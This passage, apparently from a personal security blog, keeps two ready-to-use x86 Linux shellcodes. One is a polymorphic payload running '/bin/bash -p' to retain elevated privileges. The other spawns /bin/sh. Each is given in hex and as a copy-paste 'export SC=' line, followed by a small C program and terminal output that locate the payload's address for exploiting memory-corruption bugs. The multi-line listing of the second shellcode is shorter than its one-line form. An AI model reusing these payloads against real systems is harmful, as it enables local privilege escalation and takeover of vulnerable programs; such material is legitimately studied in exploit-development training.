As a reminder, I put there two shellcodes I use. The first one comes from http://www.shell-storm.org/shellcode/ and is a polymorphic shellcode launching
execve("/bin/bash", ["/bin/bash", "-p"], NULL):"\xeb\x11\x5e\x31\xc9\xb1\x21\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x6b\x0c\x59\x9a\x53\x67\x69\x2e"
"\x71\x8a\xe2\x53\x6b\x69\x69\x30"
"\x63\x62\x74\x69\x30\x63\x6a\x6f"
"\x8a\xe4\x53\x52\x54\x8a\xe2\xce"
"\x81"
On a single line, for a convenient copy-paste:
export SC="\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"
Another shellcode is a simpler one, taken from wikipedia, launching /bin/sh on a x86 machine:
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
and the shellcode in one-line:
export SC="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
Once done, a single C program can read the address of the shellcode:
#include <stdio.h>
int main(void) {
printf("SHELLCODE found at %08x\n", (unsigned int)getenv("SC"));
return 0;
}
Just compile it, and you get the address:
mitsurugi@mitsu:~$ make sc
cc sc.c -o sc
mitsurugi@mitsu:~$ export SC="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
mitsurugi@mitsu:~$ ./sc
SHELLCODE found at bff18dcf
mitsurugi@mitsu:~$